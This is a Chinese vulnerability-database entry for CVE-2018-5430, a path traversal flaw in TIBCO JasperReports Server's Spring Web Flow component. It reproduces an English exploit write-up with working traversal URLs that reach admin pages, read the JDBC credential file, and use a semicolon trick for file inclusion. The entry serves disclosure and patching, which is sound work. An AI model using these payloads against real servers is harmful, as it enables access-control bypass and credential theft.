多款TIBCO产品Spring web flows组件信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1125044 漏洞类型 路径遍历
发布时间 2018-05-03 更新时间 2019-10-17
CVE编号 CVE-2018-5430 CNNVD-ID CNNVD-201804-795
漏洞平台 Multiple CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/44623
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201804-795
|漏洞详情
TIBCO JasperReports Server等都是美国TIBCO软件公司的产品。TIBCO JasperReports Server是一个报表生成编辑工具的服务器版,TIBCO JasperReports Server Community Edition是它的社区版。Spring web flows是其中的一个流程控制组件。 多款TIBCO产品中的Spring web flows组件存在信息泄露漏洞。攻击者可利用该漏洞访问Web应用程序的内容(包括:重要的配置文件)。以下产品和版本受到影响:TIBCO JasperReports Server 6.2.4及之前版本,6.3.0版本,6.3.2版本,6.3.3版本,6.4.0版本,6.4.2版本;TIBCO JasperReports Server Community Edition 6.4.2及之前版本;TIBCO JasperReports Server for ActiveMatrix BPM 6.4.2及之前版本;TIBCO Jaspersoft for AWS with Multi-Tenancy 6.4.2及之前版本;TIBCO Jaspersoft Reporting and Analytics for AWS 6.4.2及之前版本。
|漏洞EXP
TIBCO’s JasperReports (<=6.2.4, 6.3.0, 6.3.2-3, 6.4.0, 6.4.2, CE/ActiveMatrix BPM and Jaspersoft AWS with Multi-Tenancy/Reporting and Analytics for AWS <=6.4.2) is vulnerable to an authenticated file read and inclusion vulnerability by means of directory traversal. It is possible for an attacker, regardless of user permissions, to access or include files from within the filesystem hosting the application.

CVSS v3 Base Score: 7.7 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

- - -

## Bypassing JasperReports Access Controls
The following example allowed us to include an administrator JSP from a low privileged user (joeuser):

/jasperserver/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/adminImport

Which took us from:

getAttribute() @ HttpServletRequestParameterMap.java:57
> string[] = wrapper.getParameterValues("page")

To:

getResource() @ DirResourceSet.java:101
> file = new File(/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp")

Due to a lack of input validation we found ourselves with the capability to traverse paths to a destination of our choice. Below you will find more Proof of Concepts (PoCs) of the the attack in question:

## Accessing Administrator Export Functions

/jasperserver-pro/___________?{param}=..

##  Accessing AWS Configuration Functions
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/awsConfiguration

The above issue allowed us to load privileged portions of the application geared towards the Administrator, thus bypassing access controls.

## Local File Read

The following command allowed us to read configuration files on the server, taking advantage of an unsanitized ‘page’ perimeter and reading configuration files. An attacker would use these credentials to further pivot across application and services. Although the above screenshot provides a randomly generated password for the occasion, we decided to blur it out of habit.

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../js.jdbc.properties;

## Local File Inclusion (JSP)

And in the event of a post-intrusion scenario, an attacker would need to upload an arbitrary JSP file, masqueraded as a regular file (sans .jsp) to the victims filesystem and execute something like the following via a local file inclusion:

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/file;
NOTE: Since the application appends ‘.jsp’ to the ‘page’ paramater value, normally you would end up with ../../../jsp/modules/administer/file.jsp. However, if we want to read configuration files we need to trick Java to read our desired file, and ignore the ‘.jsp’ addition. NULL bytes (%00) do not work, however we were able to bypass the problem by adding a semicolon to our desired file.
|参考资料

来源:www.tibco.com
链接:https://www.tibco.com/support/advisories/2018/04/tibco-security-advisory-april-17-2018-tibco-jasperreports-2018-5430